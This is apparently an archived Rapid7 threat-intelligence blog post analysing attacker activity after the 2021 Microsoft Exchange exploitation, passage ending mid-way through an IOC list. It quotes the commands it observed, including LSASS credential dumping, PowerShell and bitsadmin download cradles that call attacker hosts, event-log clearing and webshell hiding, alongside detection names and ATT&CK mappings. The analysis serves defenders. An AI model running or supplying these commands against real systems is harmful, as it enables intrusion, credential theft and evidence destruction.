{ "id": "ee0698b8-0042-44e4-a6dd-08e566026038", "created_at": "2026-04-06T01:30:58.196751Z", "updated_at": "2026-04-10T13:11:35.626366Z", "deleted_at": null, "sha1_hash": "4dac904aa52be16139e9c7ef8337ecf9c4658b25", "title": "Defending Against the Zero Day: Analyzing Attacker Behavior Post-Exploitation of Microsoft Exchange", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 155222, "plain_text": "Defending Against the Zero Day: Analyzing Attacker Behavior\r\nPost-Exploitation of Microsoft Exchange\r\nBy Eoin Miller\r\nPublished: 2021-03-23 · Archived: 2026-04-06 01:13:28 UTC\r\nIn recent weeks, there has been quite a lot of reporting on the exploitation of the latest disclosed vulnerabilities in\r\nMicrosoft’s Exchange Server by an attacker referred to as HAFNIUM. One of the major reasons these latest\r\nvulnerabilities are so dangerous and appealing to attackers is that they allow them to go directly from the public\r\ninternet to executing processes as SYSTEM, the most privileged user, on the victim's system.\r\n“Running as a low-privileged account is a good security practice because then a software bug can't be used by a\r\nmalicious user to take over the whole system.”\r\nSource: Application Pool Identities\r\nBecause this service runs with the highest level of permission by default, it should be hardened and receive\r\nadditional levels of monitoring. This default configuration does not employ the principle of least privilege and is\r\nmade even more dangerous as these web applications are created with the intent to be exposed to the public\r\ninternet and not protected by other basic means like network access control lists. In addition to that, these\r\nvulnerable servers provide direct access to a great number of user hashes/passwords and email inbox contents of\r\nthe entire organization. This is one of the most direct routes to what certain attackers are commonly after in a\r\nvictim’s environment.\r\nWhile the reporting on the number of exploited systems has raised alarms for some, events of this scale have been\r\nobserved by many in the information security industry for many years. Attackers of many types are more\r\nfrequently looking to exploit the network services provided by victims to the public internet. Often, these services\r\nare on various edge devices designed specifically to be placed and exposed to the public internet. This can lead to\r\nchallenges, as these devices may be appliances, firewalls, or other devices that do not support running additional\r\nsecurity-related software, such as endpoint detection and response. These devices also commonly fall outside of\r\nstandard patch management systems. Rapid7 has observed an increased speed between when a vulnerability is\r\ndisclosed, to the creation and adoption of a working exploit being used en masse, which gives victims little time to\r\ntest and deploy fixes while adhering to change control process for systems providing mission-critical services.\r\nOver the past few years, Rapid7 has observed several different attackers looking to quickly and directly gain\r\naccess to victim systems in order to collect passwords, perform cryptojacking, distribute ransomware, and/or\r\nexfiltrate data. The attackers will typically target email boxes of specific high-ranking members of organizations\r\nor employees researching topics sensitive to their interests. The simplest method these attackers use to gain a\r\nfoothold are simple password spraying attacks against systems that are providing remote access services to the\r\npublic internet via Remote Desktop Protocol. More advanced attackers have taken advantage of recent\r\nvulnerabilities in Citrix Netscaler, Progress’ Telerik, and Pulse Secure’s Pulse Connect Secure, to name a few.\r\nhttps://www.rapid7.com/blog/post/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/\r\nPage 1 of 15\n\nWhile the method of gaining a foothold in a victim’s network can vary from these types of attacks on internet-accessible services to spear phishing, the way an attacker moves and acts can remain unchanged for many years.\r\nThe reason for this is the methods used once inside a victim’s systems rarely need to be changed, as they continue\r\nto be very effective for the attacker. The continued adoption of “living off the land” techniques that use pre-existing utilities that come with the operating systems make antivirus or application control less likely to catch and\r\nthwart an attacker. Additionally, for the attackers, this frees up or reduces the need for technical resources to\r\ndevelop exploits and tool sets.\r\nBecause the way an attacker moves and acts can remain unchanged for so long, Rapid7’s Threat Intelligence and\r\nDetection Engineering (TIDE) team continuously collaborates with our Managed Detection and Response\r\nSecurity Operations Center and Incident Response teams to develop and update our detections in InsightIDR’s\r\nAttacker Behavior Analytics to ensure all customers have coverage for the latest tactics, techniques, and\r\nprocedures employed by attackers. This allows our customers to receive alerting to attacker behavior regardless of\r\nexploitation of unknown vulnerabilities and allows them to securely advance.\r\nLast, it is extremely important to not immediately assume that only a single actor is exploiting these new\r\nvulnerabilities. Multiple groups or individuals may be exploiting the same vulnerabilities simultaneously, or even\r\na single group may do it and have various different types of follow-on activity. Without conclusive proof,\r\nproclaiming they are related is speculative, at best.\r\nThrough the use of our existing detections, Rapid7 observed attacker behavior using a China Chopper web shell\r\nagainst nine distinct victims across various industry verticals such as manufacturing, healthcare, utility providers,\r\nand more. This attacker behavior shares significant overlap with the actor known as HAFNIUM and was observed\r\nin data collected by Rapid7’s Insight Agent from Feb. 27 through March 7 in 2021. It should be noted that the way\r\nthe client used by the attacker to spawn processes through the China Chopper webshell has remained virtually\r\nunchanged since at least 2013. These command line arguments are quite distinct and easy to find in logs\r\ncontaining command line arguments. This means detections developed against these patterns have the potential for\r\nan effective lifespan for the better part of a decade.\r\nRapid7 developed additional detections based on the review of this attacker behavior. We noticed that by default,\r\nIIS when configured for Microsoft Exchange’s Outlook Web Access, it will have an environment variable and\r\nvalue set to the following:\r\nAPP_POOL_ID=MSExchangeOWAAppPool\r\nWith this knowledge, the collection of this data through Insight Agent, and the ability to evaluate it with\r\nInsightIDR’s Attacker Behavior Analytics, the TIDE team was able to write a detection that would match anytime\r\nany process was executed where the child or parent environment variable and value matched this. This allowed us\r\nto not only find the already known use of China Chopper, but also several other attackers exploiting this\r\nvulnerability using different techniques.\r\nhttps://www.rapid7.com/blog/post/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/\r\nPage 2 of 15\n\nUsing China Chopper, the attacker executed the Microsoft Sysinternals utility procdump64.exe against the\r\nlsass.exe process to copy the contents of its memory to a file on disk. This allows the attacker to retrieve and\r\nanalyze this memory dump later with utilities such as mimikatz to extract passwords from the memory dump of\r\nthis process. This enables this attacker to potentially come back to many of these victim email accounts at a later\r\ndate if two-factor authentication is not employed. Additionally, even if reasonable password change policies are\r\nimplemented at these victim locations, users will often rotate passwords in a predictable manner. For instance, if a\r\npassword for a user is “ThisIsMyPassword1!”, when forced to change, they will likely just increment the digit at\r\nthe end to “ThisIsMyPassword2!”. This makes it easy for attackers to guess the future passwords based on the\r\npredictability of human behavior.\r\nThe following commands were observed by Rapid7 being executed by the attacker known as HAFNIUM:\r\nProcudmp.exe commands executed via China Chopper webshell to write the memory contents of the lsass.exe\r\nprocess to disk:\r\ncmd /c cd /d C:\\\\root\u0026procdump64.exe -accepteula -ma lsass.exe lsass.dmp\u0026echo [S]\u0026cd\u0026echo [E]\r\ncmd /c cd /d E:\\\\logs\u0026procdump64.exe -accepteula -ma lsass.exe lsass.dmp\u0026echo [S]\u0026cd\u0026echo [E]\r\nReconnaissance commands executed via China Chopper webshell to gather information about the Active\r\nDirectory domain controllers, users, systems, and processes:\r\ncmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth\u0026HOSTNAME\" \u0026 nl\r\ncmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth\u0026nltest\" /dclist\r\ncmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth\u0026HOSTNAME\" \u0026 who\r\ncmd /c cd /d c:\\\\temp\u0026tasklist\u0026echo [S]\u0026cd\u0026echo [E]\r\ncmd /c cd /d E:\\\\logs\u0026tasklist \u0026echo [S]\u0026cd\u0026echo [E]\r\ncmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web\u0026net group \"Domain computers\" /do\u0026echo [S]\u0026cd\u0026echo [E]\r\ncmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web\u0026tasklist /v\u0026echo [S]\u0026cd\u0026echo [E]\r\nEnumeration of further information about specific processes on the victim system. The process smex_master.exe\r\nis from Trend Micro’s ScanMail and unsecapp.exe is from Microsoft Windows.\r\ncmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web\u0026wmic process where name=smex_master.exe get Executable\r\ncmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web\u0026wmic process where name=unsecapp.exe get ExecutablePath\r\ncmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web\u0026wmic process where name=unsecapp.exe get processid\u0026echo\r\nDeletion of groups in Active Directory using the net.exe command executed via China Chopper:\r\ncmd /c cd /d C:\\\\inetpub\\\\wwwroot\\\\aspnet_client\\\\system_web\u0026net group \"Exchange Organization administrators\" a\r\nNetwork connectivity check and/or egress IP address enumeration commands executed via China Chopper\r\nwebshell:\r\nhttps://www.rapid7.com/blog/post/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/\r\nPage 3 of 15\n\ncmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth\u0026ping\" -n 1 \u003cRE\r\ncmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth\u0026ping\" -n 1 \u003cRED\r\ncmd /c cd /d C:\\inetpub\\wwwroot\u0026ping -n 1 8.8.8.8\u0026echo [S]\u0026cd\u0026echo [E]\r\ncmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web\u0026c:\\windows\\temp\\curl.exe -m 10 ipinfo.io\u0026echo [S]\u0026cd\u0026ec\r\ncmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web\u0026c:\\windows\\temp\\curl.exe -vv -k -m 10 https://www.googl\r\ncmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web\u0026ping -n 1 ipinfo.io\u0026echo [S]\u0026cd\u0026echo [E]\r\ncmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web\u0026ping -n 1 www.google.com\u0026echo [S]\u0026cd\u0026echo [E]\r\ncmd /c cd /d c:\\\\temp\u0026ping www.google.com\u0026echo [S]\u0026cd\u0026echo [E]\r\nSecond-stage payload retrieval commands executed via China Chopper webshell:\r\ncmd /c cd /d C:\\\\inetpub\\\\wwwroot\\\\aspnet_client\u0026msiexec /q /i http://103.212.223.210:9900/nvidia.msi\u0026echo [S]\u0026\r\nFilesystem interaction commands executed via China Chopper webshell to search file contents, hide, and delete\r\nfiles:\r\n\\cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web\u0026findstr Request \"\\\\\u003cREDACTED_HOSTNAME\u003e\\C$\\Program Fil\r\ncmd /c cd /d C:/inetpub/wwwroot/aspnet_client\u0026attrib +h +s +r OutlookEN.aspx\u0026echo [S]\r\ncmd /c cd /d C:/inetpub/wwwroot/aspnet_client\u0026attrib +h +s +r TimeoutLogout.aspx\u0026echo [S]\r\ncmd /c cd /d C:/inetpub/wwwroot/aspnet_client\u0026del 'E:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpP\r\ncmd /c cd /d C:/inetpub/wwwroot/aspnet_client\u0026del 'E:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpP\r\nInsightIDR Attacker Behavior Analytics that detect this attacker’s activity:\r\nSuspicious Process - Process Spawned By Outlook Web Access\r\nAttacker Technique - Net Command Deleting Exchange Admin Group\r\nAttacker Tool - China Chopper Webshell Executing Commands\r\nAttacker Technique - ProcDump Used Against LSASS\r\nT1003 - OS Credential Dumping\r\nT1003.001 - OS Credential Dumping: LSASS Memory\r\nT1005 - Data from Local System\r\nT1007 - System Service Discovery\r\nT1033 - System Owner/User Discovery\r\nT1041 - Exfiltration Over C2 Channel\r\nT1047 - Windows Management Instrumentation\r\nT1057 - Process Discovery\r\nT1059 - Command and Scripting Interpreter\r\nT1059.003 - Command and Scripting Interpreter: Windows Command Shell\r\nT1071 - Application Layer Protocol\r\nT1071.001 - Application Layer Protocol: Web Protocols\r\nT1074 - Data Staged\r\nT1074.001 - Data Staged: Local Data Staging\r\nhttps://www.rapid7.com/blog/post/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/\r\nPage 4 of 15\n\nT1083 - File and Directory Discovery\r\nT1087 - Account Discovery\r\nT1087.001 - Account Discovery: Local Account\r\nT1087.002 - Account Discovery: Domain Account\r\nT1098 - Account Manipulation\r\nT1105 - Ingress Tool Transfer\r\nT1190 - Exploit Public-Facing Application\r\nT1203 - Exploitation For Client Execution\r\nT1218 - Signed Binary Proxy Execution\r\nT1218.007 - Signed Binary Proxy Execution: Msiexec\r\nT1505 - Server Software Component\r\nT1505.003 - Server Software Component: Web Shell\r\nT1518 - Software Discovery\r\nT1518.001 - Software Discovery: Security Software Discovery\r\nT1531 - Account Access Removal\r\nT1583 - Acquire Infrastructure\r\nT1583.003 - Acquire Infrastructure: Virtual Private Server\r\nT1587 - Develop Capabilities\r\nT1587.001 - Develop Capabilities: Malware\r\nT1587.004 - Develop Capabilities: Exploits\r\nT1588 - Obtain Capabilities\r\nT1588.001 - Obtain Capabilities: Malware\r\nT1588.002 - Obtain Capabilities: Tool\r\nT1588.005 - Obtain Capabilities: Exploits\r\nT1588.006 - Obtain Capabilities: Vulnerabilities\r\nT1595 - Active Scanning\r\nT1595.001 - Active Scanning: Scanning IP Blocks\r\nT1595.002 - Active Scanning: Vulnerability Scanning\r\nRapid7 has also observed several additional distinct types of post-exploitation activity of these Exchange\r\nvulnerabilities in recent weeks by several other attackers other than HAFNIUM. We have grouped these and\r\ndistilled the unique type of commands being executed into the individual sections shown below.\r\nMinidump and Makecab attacker\r\nThis attacker was seen uploading batch scripts to execute the Microsoft utility dsquery.exe to enumerate all users\r\nfrom the Active Directory domain. The attacker would also use the Minidump function in comsvcs.dll with\r\nrundll32.exe in order to write the memory of the lsass.exe process to disk. The attacker then uses the existing\r\nMicrosoft utility makecab.exe to compress the memory dump for more efficient retrieval. Overall, this attacker\r\nhas some similarities in the data targeted for collection from victims to those discussed in others reporting on the\r\nactor known as HAFNIUM. However, the tools and techniques used differ enough that this cannot easily be\r\nattributed to the same attacker without additional compelling links.\r\nhttps://www.rapid7.com/blog/post/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/\r\nPage 5 of 15\n\nC:\\Windows\\System32\\cmd.exe /c c:\\inetpub\\wwwroot\\aspnet_client\\test.bat\r\nC:\\Windows\\System32\\cmd.exe /c c:\\inetpub\\wwwroot\\aspnet_client\\test.bat\r\ndsquery * -limit 0 -filter objectCategory=person -attr * -uco\r\npowershell rundll32.exe c:\\windows\\system32\\comsvcs.dll MiniDump 900 c:\\inetpub\\wwwroot\\aspnet_client\\\u003cREDACTED_\r\nmakecab c:\\inetpub\\wwwroot\\aspnet_client\\\u003cREDACTED_33_CHARACTER_STRING\u003e.tmp.dmp c:\\inetpub\\wwwroot\\aspnet_client\r\nmakecab c:\\inetpub\\wwwroot\\aspnet_client\\\u003cREDACTED_33_CHARACTER_STRING\u003e.tmp c:\\inetpub\\wwwroot\\aspnet_client\\\u003cRE\r\nInsightIDR Attacker Behavior Analytics that detect this attacker’s activity:\r\nSuspicious Process - Process Spawned By Outlook Web Access\r\nAttacker Technique - Minidump via COM Services DLL\r\nMalicious DLL attacker\r\nThis attacker was seen uploading and executing a DLL through rundll32.exe and redirecting the output to a text\r\nfile. The demo.dll file is believed to have similar functionality to mimikatz or other hash/password dumping\r\nutilities. The attacker also made use of the net, netstat, and tasklist utilities, along with klist, in order to display\r\ncached Kerberos tickets. This again has some overlap with the types of data being collected by HAFNIUM, but\r\nthe methods to do so differ. Additionally, this is a commonly employed action for an attacker to take post-compromise.\r\nc:\\windows\\system32\\cmd.exe /c tasklist\r\ntasklist\r\nc:\\windows\\system32\\cmd.exe /c net time /do\r\nnet time /do\r\nc:\\windows\\system32\\cmd.exe /c rundll32 c:\\programdata\\demo.dll,run -lm \u003e c:\\programdata\\1.txt\r\nrundll32 c:\\programdata\\demo.dll,run -lm \u003e c:\\programdata\\1.txt\r\nc:\\windows\\system32\\cmd.exe /c klist\r\nc:\\windows\\system32\\cmd.exe /c tasklist\r\ntasklist\r\nc:\\windows\\system32\\cmd.exe /c netstat -ano\r\nnetstat -ano\r\nInsightIDR Attacker Behavior Analytics that detect this attacker’s activity:\r\nSuspicious Process - Process Spawned By Outlook Web Access\r\nOpera Browser and Cobalt Strike attacker\r\nThis attacker was seen using common techniques to download scripts with Microsoft’s BITSAdmin. These scripts\r\nwould then execute encoded PowerShell commands that would retrieve a legitimate version of the Opera Browser\r\nthat has a known DLL search order vulnerability (CVE-2018-18913). The attacker would also retrieve malicious\r\nDLLs and other files to place into the same directory as the legitimate opera_browser.exe file for execution. This\r\nwould then load the malicious code in the DLL located in the same directory as the browser. The eventual end of\r\nhttps://www.rapid7.com/blog/post/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/\r\nPage 6 of 15\n\nthis execution would result in the execution of Cobalt Strike, a favorite tool of attackers that distributes\r\nransomware:\r\nC:\\Windows\\System32\\bitsadmin.exe /rawreturn /transfer getfile http://89.34.111.11/3.avi c:\\Users\\public\\2.bat\r\nC:\\Windows\\System32\\cmd.exe /c c:\\Users\\public\\2.bat\r\npowershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8A\r\npowershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8A\r\npowershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8A\r\nmsiexec.exe -k\r\npowershell Start-Sleep -Seconds 10\r\ncmd /c C:\\\\users\\\\public\\\\opera\\\\opera_browser.exe\r\nC:\\\\users\\\\public\\\\opera\\\\opera_browser.exe\r\npowershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8A\r\nBase64 decoded strings passed to PowerShell:\r\n(new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/code','C:\\users\\public\\opera\\code')\r\n(new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/opera_browser.png','C:\\users\\public\\op\r\n(new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/opera_browser.dll','C:\\users\\public\\op\r\n(new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/opera_browser.exe','C:\\users\\public\\op\r\nInsightIDR Attacker Behavior Analytics that detect this attacker’s activity:\r\nSuspicious Process - Process Spawned By Outlook Web Access\r\nAttacker Technique - Download And Execute With Background Intelligent Transfer Service\r\nAttacker Technique - URL Passed To BitsAdmin\r\nSix-character webshell attacker\r\nThis attacker was seen uploading webshells and copying them to other locations within the webroot.\r\ncmd /c copy C:\\inetpub\\wwwroot\\aspnet_client\\discover.aspx \"C:\\Program Files\\Microsoft\\Exchange Server\\V15\\Fron\r\nInsightIDR Attacker Behavior Analytics that detect this attacker’s activity:\r\nSuspicious Process - Process Spawned By Outlook Web Access\r\nEncoded PowerShell download cradle attacker\r\nThis attacker was seen executing encoded PowerShell commands that would download malware from a remote\r\nlocation. The would also execute the getmac.exe utility to enumerate information about the network adapters.\r\ncmd.exe /c powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB\r\nC:\\Windows\\system32\\getmac.exe /FO CSV\r\nhttps://www.rapid7.com/blog/post/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/\r\nPage 7 of 15\n\nBase64 decoded strings passed to PowerShell:\r\nIEX (New-Object Net.WebClient).downloadstring('http://p.estonine.com/p?e')\r\nInsightIDR Attacker Behavior Analytics that detect this attacker’s activity:\r\nSuspicious Process - Process Spawned By Outlook Web Access\r\nAttacker Technique - PowerShell Download Cradles\r\nTen-character webshell attacker\r\nThis attacker was seen uploading webshells, using icacls to set the directory permissions of the webroot to be\r\nread-only recursively. Additionally, the attacker would use the attrib.exe utility to set the file containing the\r\nwebshell to be marked as hidden and system to make finding these more difficult.\r\nC:\\Windows\\System32\\cmd.exe /c move \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\r\nC:\\Windows\\System32\\cmd.exe /c icacls \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\aut\r\nC:\\Windows\\System32\\cmd.exe /c =attrib \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\au\r\nattrib \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\\u003cREDACTED_10_CHARACTER_STRING\r\nC:\\Windows\\System32\\cmd.exe /c icacls \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\ecp\\aut\r\nInsightIDR Attacker Behavior Analytics that detect this attacker’s activity:\r\nSuspicious Process - Process Spawned By Outlook Web Access\r\nAttacker Technique - Modification Of Files In Exchange Webroot\r\n7zip and NetSupport Manager attacker\r\nThis attacker used the 7zip compression utility (renamed to MonitoringLog.exe) and the  NetSupport Manager\r\nremote access tool (client32.exe). These utilities were most likely retrieved by the script1.ps1 PowerShell script\r\nand located within a password-protected archive named Service.Information.rtf. Once extracted, these utilities\r\nwere executed:\r\nc:\\windows\\system32\\cmd.exe dir C:\\Programdata\\\r\nc:\\windows\\system32\\cmd.exe /c powershell C:\\Programdata\\script1.ps1\r\npowershell C:\\Programdata\\script1.ps1\r\nC:\\ProgramData\\MonitoringLog.exe x -p\u003cREDACTED_STRING\u003e -y C:\\ProgramData\\Service.Information.rtf -oC:\\ProgramDat\r\nping -n 10 127.0.0.1\r\nc:\\windows\\system32\\cmd.exe /c C:\\Programdata\\MonitoringLog.cmd\r\ntaskkill /Im rundll32.exe /F\r\nC:\\ProgramData\\NetConnections\\client32.exe\r\nping -n 10 127.0.0.1\r\ntaskkill /Im rundll32.exe /F\r\nc:\\windows\\system32\\cmd.exe /c tasklist /v\r\ntasklist /v\r\nhttps://www.rapid7.com/blog/post/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/\r\nPage 8 of 15\n\nInsightIDR Attacker Behavior Analytics that detect this attacker’s activity:\r\nSuspicious Process - Process Spawned By Outlook Web Access\r\nEvent log deletion and virtual directory creation attacker\r\nThis attacker created virtual directories within the existing webroot using the Microsoft utility appcmd.exe, and\r\nthen cleared all event logs on the system using wevtutl.exe:\r\nCMD C:\\Windows\\System32\\inetsrv\\appcmd.exe add vdir \"/app.name:Default Web Site/\" \"/path:/owa/auth/ /zfwqn\" /ph\r\n \r\nCMD /c for /f %x in ('wevtutil el') do wevtutil cl %x\r\nwevtutil el\r\nwevtutil cl \u003cREDACTED_ALL_DIFFERENT_EVENT_LOGS\u003e\r\nInsightIDR Attacker Behavior Analytics that detect this attacker’s activity:\r\nSuspicious Process - Process Spawned By Outlook Web Access\r\nAttacker Technique - Clearing Event Logs With WEvtUtil\r\nWebshell enumeration attacker\r\nThis attacker was seen executing encoded PowerShell commands to use the type command to view the contents\r\npossible webshell files named outlooken.aspx seen used by HAFNIUM and other attackers. This could be\r\nsomeone looking to use the footholds placed by other attackers or even researchers using the same exploit to\r\nidentify systems that have been successfully compromised based on the reported activity associated with\r\nHAFNIUM:\r\ncmd /c powershell -enc YwBtAGQALgBlAHgAZQAgAC8AYwAgACIAdAB5AHAAZQAgACIAIgBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwA\r\ncmd /c powershell -enc dAB5AHAAZQAgACIAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAR\r\nBase64 decoded strings:\r\ntype \"C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\outlooken.aspx\"\r\nInsightIDR Attacker Behavior Analytics that detect this attacker’s activity:\r\nSuspicious Process - Process Spawned By Outlook Web Access\r\nCoinminer dropper attacker\r\nSome attackers were seen using PowerShell to retrieve and execute coinminers.\r\ncmd.exe /c powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/m103w.zip -OutFile C:\\win\r\npowershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/m103w.zip -OutFile C:\\windows\\temp\\ds\r\nhttps://www.rapid7.com/blog/post/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/\r\nPage 9 of 15\n\nC:\\windows\\temp\\dsf.exe RS9+cn_0\r\nAnd again with a slightly different filename to retrieved from:\r\ncmd.exe /c powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/c103w-at.zip -OutFile C:\\\r\npowershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/c103w-at.zip\r\nC:\\windows\\temp\\dsf.exe RS9+cn_0\r\nInsightIDR Attacker Behavior Analytics that detect this attacker’s activity:\r\nSuspicious Process - Process Spawned By Outlook Web Access\r\nSimple reconnaissance attacker(s)\r\nSome attackers were seen performing extremely simple reconnaissance commands to gather more information\r\nabout the host, processes, users, and systems within Active Directory:\r\nnet group /domain\r\nnet group \"Domain Computers\" /do\r\nnet group \"Domain Users\" /do\r\nnet group IntranetAdmins /do\r\nnet user /domain\r\nsysteminfo\r\ntasklist\r\nAnother example where only simple recon type commands were executed:\r\nwhoami\r\nsysteminfo\r\nsysteminfo\r\nwmic product get name\r\nWmic product get name\r\nInsightIDR Attacker Behavior Analytics that detect this attacker’s activity:\r\nSuspicious Process - Process Spawned By Outlook Web Access\r\nConclusions\r\nWhile there was widespread exploitation of these vulnerabilities in the wild, it does appear that this was the work\r\nof several different attackers with different motivations and skills. Rapid7 did even observe exploitation of the\r\nsame victim by multiple different actors (HAFNIUM and coinminer drops) within a two-week timeframe. Several\r\nattackers used this vulnerability to gather passwords/hashes from victim systems en masse. This enabled them to\r\nhttps://www.rapid7.com/blog/post/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/\r\nPage 10 of 15\n\ngather data from several victims that would allow them access into various Active Directory services as long as\r\nthose credentials gathered remain unchanged.\r\nThis dumping of credentials may have been done at this scale as the attackers were aware this activity would be\r\ndiscovered and the vulnerability would be patched very soon. This would potentially allow these attackers to\r\ncontinue to access these accounts even after the systems had been successfully patched. The level of escalation in\r\nuse by HAFNIUM subsequent use by several other actors may point to the same exploit being shared or leaked.\r\nAt the time of this writing, Rapid7 has no definitive evidence of this and acknowledges that this statement is\r\nspeculative.\r\nBy continuing to analyze the behavior of attackers post-compromise to develop detections, it can greatly increase\r\nthe likelihood to be notified of a breach. This is regardless of the method used to obtain the initial access to the\r\nvictim environment. Additionally, these detections have longer lifespans and can be made available in a more\r\ntimely manner than most indicators of compromise are shared in other types of public reporting.\r\nObserved CVEs employed by attackers:\r\nCommon Vulnerabilities\r\nand Exposure\r\nDescription\r\nCVE-2018-18913\r\nOpera Search Order Hijacking Vulnerability\r\nhttps://blog.lucideus.com/2019/02/opera-search-order-hijacking-cve-2018-\r\n18913.html\r\nCVE-2021-26855\r\nMicrosoft Exchange Server remote code execution\r\nhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-\r\n26855\r\nCVE-2021-26857\r\nMicrosoft Exchange Server remote code execution\r\nhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-\r\n26857\r\nCVE-2021-26858\r\nMicrosoft Exchange Server remote code execution\r\nhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-\r\n26858\r\nCVE-2021-27065\r\nMicrosoft Exchange Server remote code execution\r\nhttps://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27065\r\nObserved IOCs employed by all attackers:\r\nType Value\r\nFQDN estonine.com\r\nFQDN p.estonine.com\r\nhttps://www.rapid7.com/blog/post/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/\r\nPage 11 of 15\n\nType Value\r\nFQDN ipinfo.io\r\nFilepath C:\\inetpub\\wwwroot\\aspnet_client\\\r\nFilepath C:\\inetpub\\wwwroot\\aspnet_client\\system_web\\\r\nFilepath C:\\Program Files\\Microsoft\\Exchange Server\\V15\\Bin\\\r\nFilepath c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\ecp\\auth\\\r\nFilepath C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\\r\nFilepath\r\nC:\\Program Files\\Microsoft\\Exchange\r\nServer\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\Current\\themes\\resources\\\r\nFilepath C:\\Programdata\\\r\nFilepath C:\\ProgramData\\COM\\zfwqn\\\r\nFilepath C:\\root\\\r\nFilepath C:\\Users\\Public\\\r\nFilepath C:\\Users\\Public\\Opera\\\r\nFilepath C:\\Windows\\temp\\\r\nFilename 1.txt\r\nFilename 2.bat\r\nFilename 3.avi\r\nFilename b.log\r\nFilename c103w-at.zip\r\nFilename client32.exe\r\nFilename code\r\nFilename curl.exe\r\nFilename demo.dll\r\nFilename discover.aspx\r\nFilename dsf.exe\r\nFilename 